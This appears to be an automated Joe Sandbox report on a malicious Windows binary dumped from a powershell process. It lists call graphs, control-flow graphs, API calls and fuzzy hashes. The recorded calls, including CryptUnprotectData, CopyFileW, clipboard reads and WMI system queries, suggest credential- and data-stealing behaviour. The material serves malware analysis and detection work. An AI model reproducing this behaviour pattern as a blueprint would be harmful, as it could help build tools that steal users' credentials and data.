43aaa0 RtlFreeHeap 13372 422007 13370->13372 13371 42191d 13371->13368 13373 421880 13371->13373 13382 43c1f0 LdrInitializeThunk 13371->13382 13372->13373 13388 43c1f0 LdrInitializeThunk 13372->13388 13375->13370 13379 43e360 13378->13379 13380 43e4be 13379->13380 13389 43c1f0 LdrInitializeThunk 13379->13389 13380->13371 13382->13371 13383->13368 13385 43aab3 13384->13385 13386 43aac4 13384->13386 13387 43aab8 RtlFreeHeap 13385->13387 13386->13368 13387->13386 13388->13372 13389->13380 13471 4214b0 13472 4214be 13471->13472 13474 421510 13471->13474 13475 4215d0 13472->13475 13476 4215e0 13475->13476 13476->13476 13479 43e510 13476->13479 13478 4216df 13481 43e530 13479->13481 13480 43e68e 13480->13478 13481->13480 13483 43c1f0 LdrInitializeThunk 13481->13483 13483->13480 13390 43aad0 13391 43aaf0 13390->13391 13394 43ab2e 13391->13394 13398 43c1f0 LdrInitializeThunk 13391->13398 13392 43ace1 13394->13392 13397 43ac0e 13394->13397 13399 43c1f0 LdrInitializeThunk 13394->13399 13395 43aaa0 RtlFreeHeap 13395->13392 13397->13395 13398->13394 13399->13397 13484 40d835 13486 40d71d 13484->13486 13485 40d8e2 13486->13484 13486->13485 13486->13486 13488 43c1f0 LdrInitializeThunk 13486->13488 13488->13486 13400 431715 13401 43174d SysAllocString 13400->13401 13403 431903 13401->13403 13404 415799 13405 41579e 13404->13405 13414 43e6e0 13405->13414 13407 4157b7 13409 4157f8 13407->13409 13418 43e7d0 13407->13418 13413 4158fe 13409->13413 13424 43c1f0 LdrInitializeThunk 13409->13424 13411 415bc6 13412 415b95 CryptUnprotectData 13412->13411 13413->13411 13413->13412 13416 43e700 13414->13416 13415 43e77e 13415->13407 13416->13415 13425 43c1f0 LdrInitializeThunk 13416->13425 13420 43e800 13418->13420 13419 43e87f 13421 43e94e 13419->13421 13427 43c1f0 LdrInitializeThunk 13419->13427 13420->13419 13426 43c1f0 LdrInitializeThunk 13420->13426 13421->13409 13424->13413 13425->13415 13426->13419 13427->13421 13489 40c679 13490 40c690 13489->13490 13493 40c6de 13490->13493 13581 43c1f0 LdrInitializeThunk 13490->13581 13491 40c75e 13509 423860 13491->13509 13493->13491 13582 43c1f0 LdrInitializeThunk 13493->13582 13496 40c7cd 13518 423f20 13496->13518 13498 40c7ed 13534 4241c0 13498->13534 13500 40c80d 13552 425e30 13500->13552 13506 40c83f 13583 4329c0 13506->13583 13512 4238b0 13509->13512 13510 4218a0 2 API calls 13516 4239b4 13510->13516 13511 423c61 GetLogicalDrives 13515 43e510 LdrInitializeThunk 13511->13515 13512->13512 13513 43e510 LdrInitializeThunk 13512->13513 13514 423ac1 13512->13514 13512->13516 13517 423c77 13512->13517 13513->13514 13514->13511 13514->13514 13514->13516 13514->13517 13515->13517 13516->13496 13517->13510 13517->13516 13524 423fb0 13518->13524 13519 424198 13519->13498 13521 4240af 13595 41f7a0 13521->13595 13522 42439c 13607 43eca0 13522->13607 13524->13519 13524->13521 13524->13522 13599 43efb0 13524->13599 13528 424404 13529 424f30 13528->13529 13530 43eb60 LdrInitializeThunk 13528->13530 13531 424ffa 13528->13531 13619 43f330 13528->13619 13627 43c1f0 LdrInitializeThunk 13529->13627 13530->13528 13531->13531 13535 4241d0 13534->13535 13536 43eb60 LdrInitializeThunk 13535->13536 13539 424078 13536->13539 13537 43efb0 2 API calls 13537->13539 13538 424198 13538->13500 13539->13537 13539->13538 13540 42439c 13539->13540 13541 4240af 13539->13541 13542 43eca0 2 API calls 13540->13542 13543 41f7a0 2 API calls 13541->13543 13544 4243cb 13542->13544 13543->13538 13545 43eb60 LdrInitializeThunk 13544->13545 13547 424404 13544->13547 13545->13547 13546 43eb60 LdrInitializeThunk 13546->13547 13547->13546 13547->13547 13548 424ffa 13547->13548 13549 424f30 13547->13549 13550 43f330 2 API calls 13547->13550 13548->13548 13635 43c1f0 LdrInitializeThunk 13549->13635 13550->13547 13558 425e5c 13552->13558 13554 43efb0 2 API calls 13554->13558 13555 40c82d 13561 4266d0 13555->13561 13556 43eb60 LdrInitializeThunk 13556->13558 13558->13554 13558->13555 13558->13556 13559 43eca0 2 API calls 13558->13559 13560 43c1f0 LdrInitializeThunk 13558->13560 13636 43c180 13558->13636 13646 43f720 13558->13646 13559->13558 13560->13558 13562 4266f0 13561->13562 13564 42674e 13562->13564 13656 43c1f0 LdrInitializeThunk 13562->13656 13564->13564 13566 40c836 13564->13566 13568 42683e 13564->13568 13657 43c1f0 LdrInitializeThunk 13564->13657 13565 43aaa0 RtlFreeHeap 13565->13566 13569 426b50 13566->13569 13568->13565 13571 426b59 13569->13571 13570 426b64 13570->13506 13571->13570 13658 438c50 13571->13658 13573 427795 13665 43c1f0 LdrInitializeThunk 13573->13665 13574 43e340 LdrInitializeThunk 13580 4273b8 13574->13580 13575 43e6e0 LdrInitializeThunk 13575->13580 13576 4275c2 CopyFileW 13576->13580 13577 43e7d0 LdrInitializeThunk 13577->13580 13579 4273e2 13579->13506 13580->13573 13580->13574 13580->13575 13580->13576 13580->13577 13580->13579 13580->13580 13581->13493 13582->13491 13667 414400 13583->13667 13585 4329ce OpenClipboard 13586 4329f0 13585->13586 13587 40c891 13586->13587 13588 4329fb GetClipboardData 13586->13588 13589 432b73 CloseClipboard 13588->13589 13590 432a16 GlobalLock 13588->13590 13589->13587 13592 432a35 13590->13592 13591 432b62 GlobalUnlock 13591->13589 13593 432a73 GetWindowLongW 13592->13593 13594 432a45 13592->13594 13593->13594 13594->13591 13596 41f7d0 13595->13596 13596->13596 13597 4218a0 2 API calls 13596->13597 13598 41f7f9 13597->13598 13598->13519 13600 43efd0 13599->13600 13603 43f04e 13600->13603 13628 43c1f0 LdrInitializeThunk 13600->13628 13601 43f31c 13601->13524 13603->13601 13606 43f17e 13603->13606 13629 43c1f0 LdrInitializeThunk 13603->13629 13604 43aaa0 RtlFreeHeap 13604->13601 13606->13604 13608 43ecc0 13607->13608 13611 43ed3e 13608->13611 13630 43c1f0 LdrInitializeThunk 13608->13630 13609 4243cb 13609->13528 13615 43eb60 13609->13615 13611->13609 13614 43ee6e 13611->13614 13631 43c1f0 LdrInitializeThunk 13611->13631 13612 43aaa0 RtlFreeHeap 13612->13609 13614->13612 13617 43eb80 13615->13617 13616 43ec6e 13616->13528 13617->13616 13632 43c1f0 LdrInitializeThunk 13617->13632 13620 43f360 13619->13620 13623 43f3de 13620->13623 13633 43c1f0 LdrInitializeThunk 13620->13633 13621 43f712 13621->13528 13623->13621 13626 43f50e 13623->13626 13634 43c1f0 LdrInitializeThunk 13623->13634 13624 43aaa0 RtlFreeHeap 13624->13621 13626->13624 13626->13626 13627->13519 13628->13603 13629->13606 13630->13611 13631->13614 13632->13616 13633->13623 13634->13626 13635->13538 13637 43c1d0 13636->13637 13638 43c1a6 13636->13638 13639 43c1d6 13636->13639 13640 43c198 13636->13640 13642 43c1ba 13636->13642 13643 43aaa0 RtlFreeHeap 13637->13643 13645 43c1ab RtlReAllocateHeap 13638->13645 13641 43aaa0 RtlFreeHeap 13639->13641 13640->13637 13640->13638 13640->13639 13640->13642 13644 43c1df 13641->13644 13642->13558 13643->13639 13645->13642 13647 43f731 13646->13647 13650 43f8ae 13647->13650 13654 43c1f0 LdrInitializeThunk 13647->13654 13648 43fb29 13648->13558 13650->13648 13652 43fa29 13650->13652 13655 43c1f0 LdrInitializeThunk 13650->13655 13651 43aaa0 RtlFreeHeap 13651->13648 13652->13651 13654->13650 13655->13652 13656->13564 13657->13568 13663 438c80 13658->13663 13659 43eb60 LdrInitializeThunk 13659->13663 13660 43efb0 2 API calls 13660->13663 13661 438db8 13661->13580 13662 43f720 2 API calls 13662->13663 13663->13659 13663->13660 13663->13661 13663->13662 13666 43c1f0 LdrInitializeThunk 13663->13666 13665->13579 13666->13663 13667->13585 13429 43cb19 13431 43cb40 13429->13431 13430 43cbae 13431->13430 13433 43c1f0 LdrInitializeThunk 13431->13433 13433->13430 13434 430758 SysAllocString 13435 43089c 13434->13435

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 9 437df0-437e0f 10 437e10-437e24 9->10 10->10 11 437e26-437e34 10->11 12 437e40-437e54 11->12 12->12 13 437e56-437e97 12->13 14 437ea0-437ec5 13->14 14->14 15 437ec7-437ede 14->15 17 437f92-437f9f 15->17 18 437ee4-437eef 15->18 20 437fa0-437fe0 17->20 19 437ef0-437f22 18->19 19->19 21 437f24-437f37 19->21 20->20 22 437fe2-43803c CoCreateInstance 20->22 23 437f40-437f82 21->23 24 438042-43807b 22->24 25 438440-43846f call 43dbf0 GetVolumeInformationW 22->25 23->23 27 437f84-437f8e 23->27 28 438080-4380bc 24->28 31 438471-438475 25->31 32 438479-43847b 25->32 27->17 28->28 29 4380be-4380e9 SysAllocString 28->29 35 43842f-43843c SysFreeString 29->35 36 4380ef-438109 CoSetProxyBlanket 29->36 31->32 34 43848d-438494 32->34 37 4384a0-4384b6 34->37 38 438496-43849d 34->38 35->25 39 438425-43842b 36->39 40 43810f-438121 36->40 41 4384c0-4384f0 37->41 38->37 39->35 42 438130-438177 40->42 41->41 43 4384f2-43852b 41->43 42->42 45 438179-4381f2 SysAllocString 42->45 44 438530-438573 43->44 44->44 46 438575-4385a5 call 41e5c0 44->46 47 438200-438235 45->47 51 4385b0-4385b8 46->51 47->47 49 438237-438261 SysAllocString 47->49 54 438413-438423 SysFreeString * 2 49->54 55 438267-438289 49->55 51->51 53 4385ba-4385bc 51->53 56 4385c2-4385d2 call 4081b0 53->56 57 438480-438487 53->57 54->39 62 438409-438410 SysFreeString 55->62 63 43828f-438292 55->63 56->57 57->34 59 4385d7-4385de 57->59 62->54 63->62 64 438298-43829d 63->64 64->62 65 4382a3-4382ef VariantInit 64->65 66 4382f0-438319 65->66 66->66 67 43831b-438333 66->67 69 438339-43833f 67->69 70 4383f8-438405 VariantClear 67->70 69->70 71 438345-438353 69->71 70->62 72 438355-43835a 71->72 73 43838d 71->73 75 43836c-438370 72->75 74 43838f-4383b7 call 408020 call 408d50 73->74 86 4383b9 74->86 87 4383be-4383ca 74->87 77 438372-43837b 75->77 78 438360 75->78 81 438382-438386 77->81 82 43837d-438380 77->82 80 438361-43836a 78->80 80->74 80->75 81->80 84 438388-43838b 81->84 82->80 84->80 86->87 88 4383d1-4383f4 call 408050 call 408030 87->88 89 4383cc 87->89 88->70 89->88
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                                                                                                                    • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                                                                                                                    • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                                                                                                                    • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                                                                                                                    • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004383F9
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00438410
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0043841D
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00438423
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                                                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Free$Alloc$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                    • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                    • API String ID: 1341229144-1397720406
                                                                                                                                    • Opcode ID: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
                                                                                                                                    • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                                                                                                                    • Opcode Fuzzy Hash: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
                                                                                                                                    • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 100 423860-4238af 101 4238b0-4238ed 100->101 101->101 102 4238ef-423936 101->102 104 423940-423968 102->104 104->104 105 42396a-423975 104->105 106 4239d2-4239da 105->106 107 4239b4 105->107 108 423ae4-423af0 105->108 109 423ad4-423adb 105->109 110 4239c5-4239d1 105->110 111 423cb5-423d5b 105->111 112 423c9a 105->112 113 423c88-423c92 105->113 114 42397c-423981 105->114 115 4239bc-4239c2 call 408030 105->115 118 4239e3 106->118 119 4239dc-4239e1 106->119 107->115 120 423af2-423af7 108->120 121 423af9 108->121 109->108 116 423d60-423da9 111->116 113->112 122 423983-423988 114->122 123 42398a 114->123 115->110 116->116 124 423dab-423dba call 4218a0 116->124 126 4239ea-423a22 call 408020 118->126 119->126 127 423b00-423ba8 call 408020 120->127 121->127 128 42398d-4239ad call 408020 122->128 123->128 133 423dbf-423dc2 124->133 137 423a30-423a5e 126->137 138 423bb0-423bff 127->138 128->106 128->107 128->108 128->109 128->110 128->111 128->112 128->113 128->115 141 423dca-423def 133->141 137->137 142 423a60-423a68 137->142 138->138 139 423c01-423c0d 138->139 143 423c31-423c3e 139->143 144 423c0f-423c16 139->144 145 423df0-423e0c 141->145 146 423a81-423a8e 142->146 147 423a6a-423a6f 142->147 152 423c40-423c44 143->152 153 423c61-423c81 GetLogicalDrives call 43e510 143->153 149 423c20-423c2f 144->149 145->145 154 423e0e-423e91 145->154 150 423a90-423a94 146->150 151 423ab1-423abc call 43e510 146->151 148 423a70-423a7f 147->148 148->146 148->148 149->143 149->149 155 423aa0-423aaf 150->155 160 423ac1-423acd 151->160 157 423c50-423c5f 152->157 153->110 153->112 153->113 153->115 153->141 163 423ca0-423ca6 call 408030 153->163 164 423f05-423f0e call 408030 153->164 165 423eff 153->165 166 423caf 153->166 159 423ea0-423ece 154->159 155->151 155->155 157->153 157->157 159->159 162 423ed0-423ef5 call 421740 159->162 160->108 160->109 160->111 160->112 160->113 160->141 160->163 162->165 163->166 165->164 166->111
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                                                                                    • API String ID: 0-1763234448
                                                                                                                                    • Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
                                                                                                                                    • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                                                                                                    • Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
                                                                                                                                    • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 173 415799-4157cc call 408030 call 43e6e0 178 415850 173->178 179 4157d3-415800 call 408020 call 43e7d0 173->179 180 415852-415869 173->180 181 415842-415847 173->181 182 415807 173->182 183 415839-41583f call 408030 173->183 184 415818-41582c call 401000 173->184 178->180 179->178 179->180 179->181 179->182 179->183 179->184 187 415870-4158cb 180->187 181->178 182->184 183->181 184->183 187->187 191 4158cd-4158d5 187->191 194 4158d7-4158e6 191->194 195 41591a-41597b call 401a90 191->195 198 4158f0-4158f7 194->198 202 415980-4159b4 195->202 200 415900-415906 198->200 201 4158f9-4158fc 198->201 200->195 204 415908-415917 call 43c1f0 200->204 201->198 203 4158fe 201->203 202->202 206 4159b6-4159d3 call 401dd0 202->206 203->195 204->195 210 415d60 206->210 211 415bc6-415bcb 206->211 212 415d46-415d5f call 43dbf0 206->212 213 415d66 206->213 214 415d7a-415ddf 206->214 215 4159da-4159df 206->215 216 415d3d-415d43 call 408030 206->216 217 415d6c-415d78 call 408030 206->217 219 415bd0-415bd9 211->219 212->210 220 415de0-415dfa 214->220 221 4159e0-4159e6 215->221 216->212 217->214 219->219 226 415bdb-415be2 219->226 220->220 227 415dfc-415e16 call 401dd0 220->227 221->221 228 4159e8-415a07 221->228 230 415be4-415be9 226->230 231 415c06 226->231 227->210 227->211 227->212 227->213 227->214 227->216 227->217 233 415a09-415a0c 228->233 234 415a0e 228->234 236 415c09-415c4b call 408020 230->236 231->236 233->234 238 415a0f-415a28 233->238 234->238 244 415c50-415cb6 236->244 240 415a2a-415a2d 238->240 241 415a2f 238->241 240->241 242 415a30-415a4e call 408020 240->242 241->242 250 415a54-415a5b 242->250 251 415b59-415bbf call 43dbf0 CryptUnprotectData 242->251 244->244 246 415cb8-415cc7 244->246 248 415ce1-415cf8 246->248 249 415cc9-415ccf 246->249 253 415d21-415d37 call 408cb0 248->253 254 415cfa-415d01 248->254 252 415cd0-415cdf 249->252 255 415a80-415aca call 41dae0 * 2 250->255 251->210 251->211 251->212 251->213 251->214 251->216 251->217 252->248 252->252 253->216 257 415d10-415d1f 254->257 265 415a70-415a7a 255->265 266 415acc-415ae7 call 41dae0 255->266 257->253 257->257 265->251 265->255 266->265 269 415ae9-415b11 266->269 270 415a61-415a65 269->270 271 415b17-415b2d call 41dae0 269->271 270->265 274 415b33-415b54 271->274 275 415a5d 271->275 274->265 275->270
                                                                                                                                    APIs
                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                    • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                                                                                                    • API String ID: 834300711-3328159043
                                                                                                                                    • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                                                    • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                                                                                                    • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                                                    • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 324 408850-408861 call 43bc60 327 408867-40888f call 408020 324->327 328 408acf-408ad1 ExitProcess 324->328 331 408890-4088cb 327->331 332 408904-408916 call 4354e0 331->332 333 4088cd-408902 331->333 336 408ab8-408abf 332->336 337 40891c-40893f GetCurrentProcessId GetCurrentThreadId 332->337 333->331 338 408ac1-408ac7 call 408030 336->338 339 408aca call 43c160 336->339 340 408941-408943 337->340 341 408945-408a3b SHGetSpecialFolderPathW GetForegroundWindow 337->341 338->339 339->328 340->341 344 408a6b-408aac call 409b00 341->344 345 408a3d-408a69 341->345 344->336 349 408aae call 40c550 344->349 345->344 351 408ab3 call 40b390 349->351 351->336
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                                                                                                    • GetForegroundWindow.USER32 ref: 00408A33
                                                                                                                                      • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                      • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                                                                                                      • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3072701918-0
                                                                                                                                    • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                    • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                                                                                                    • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                    • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9
                                                                                                                                    APIs
                                                                                                                                    • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 431715-43174b 1 43174d-431750 0->1 2 431793-431901 SysAllocString 1->2 3 431752-431791 1->3 4 431903-431906 2->4 3->1 5 431908-43193c 4->5 6 43193e-431980 4->6 5->4 8 43198a-4319c2 6->8
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocString
                                                                                                                                    • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                    • API String ID: 2525500382-534244583
                                                                                                                                    • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                    • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                                                                                                                    • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                    • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 391 430758-43089a SysAllocString 392 43089c-43089f 391->392 393 4308a1-4308c6 392->393 394 4308c8-43090a 392->394 393->392 396 430914-43093a 394->396
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocString
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2525500382-4108050209
                                                                                                                                    • Opcode ID: 3105f6317aa136daeee14573320fe7428ce014bf8f2ecab488f271abe27fc21a
                                                                                                                                    • Instruction ID: a094da954053901be58a768e712714aa916a7f14eaab1c75cde4f4bd701cd36d
                                                                                                                                    • Opcode Fuzzy Hash: 3105f6317aa136daeee14573320fe7428ce014bf8f2ecab488f271abe27fc21a
                                                                                                                                    • Instruction Fuzzy Hash: A571B260008BD28EC366CB3D89589057FA16B6B230B4A87D8E0FA4F7F7D265D506C766
                                                                                                                                    APIs
                                                                                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 00436165
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DefaultLanguageUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 95929093-0
                                                                                                                                    • Opcode ID: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
                                                                                                                                    • Instruction ID: 741c48333e69648009e785c6466c575ff7d71c05fd411e4f0ced63eefbf4b49a
                                                                                                                                    • Opcode Fuzzy Hash: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
                                                                                                                                    • Instruction Fuzzy Hash: 86115B32D052968FDB14CB3C8C502ADBFB15F8A320F1983EDD8A5A33D5D9304E428B51
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2020703349-0
                                                                                                                                    • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                    • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                                                                                    • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                    • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D
                                                                                                                                    APIs
                                                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                                                                    • Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
                                                                                                                                    • Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                                                                    • Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                    • Opcode ID: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
